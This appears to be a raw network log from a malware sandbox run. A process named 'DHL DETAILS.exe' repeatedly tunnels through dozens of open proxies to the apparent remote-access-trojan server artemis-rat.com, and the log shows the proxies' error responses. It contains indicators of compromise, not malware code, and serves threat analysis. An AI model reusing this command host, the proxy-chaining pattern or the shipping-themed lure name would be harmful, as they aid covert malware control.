                                                                                    Mar 9, 2024 13:14:26.580302954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.677306890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1708192.168.2.55089351.15.252.246163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.529556036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1709192.168.2.5552015.252.23.22010816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.530828953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1710192.168.2.5550535.44.42.115583866352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.533704996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1711192.168.2.5552258.210.80.191156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.534879923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1712192.168.2.555098211.93.2.19073026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.535017967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.010783911 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1713192.168.2.555227203.222.24.36806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.535192966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1714192.168.2.555179103.66.177.17322516352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.535984039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1715192.168.2.55520252.172.1.186806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.535985947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1716192.168.2.553358220.194.189.14431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.543452978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1717192.168.2.555224216.9.224.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.543584108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1718192.168.2.555119222.138.76.690026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.544259071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.000955105 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1719192.168.2.554446201.144.20.23156786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.562855959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1720192.168.2.555153178.128.113.118231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.569473982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.033972979 CET1286INHTTP/1.1 502 Bad Gateway
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3693
                                                                                    X-Squid-Error: ERR_CONNECT_FAIL 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1721192.168.2.555229195.87.217.7533896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.580051899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1722192.168.2.55505139.165.0.13790026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.619497061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.266220093 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1723192.168.2.555016111.53.178.24973026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.627140999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1724192.168.2.55523623.137.248.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.633778095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1725192.168.2.551132163.172.131.178163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.634094000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.973947048 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1726192.168.2.55376172.49.49.11310346352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.635301113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1727192.168.2.555230193.84.89.20284436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.638618946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1728192.168.2.554017206.220.175.241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.647192955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1729192.168.2.555231185.110.190.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.652352095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1730192.168.2.555233185.38.111.180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.653266907 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:20.974342108 CET75INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:20 GMT
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:21.298830986 CET103INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                    Data Ascii: 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1731192.168.2.550996103.126.219.3780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.654544115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.056550980 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1732192.168.2.554562159.223.71.71592436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.672840118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.364722013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.380240917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1733192.168.2.555238171.250.222.1310806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.704457998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.520788908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1734192.168.2.552064199.58.185.941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.716902971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1735192.168.2.55523493.171.220.22988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:20.733798027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
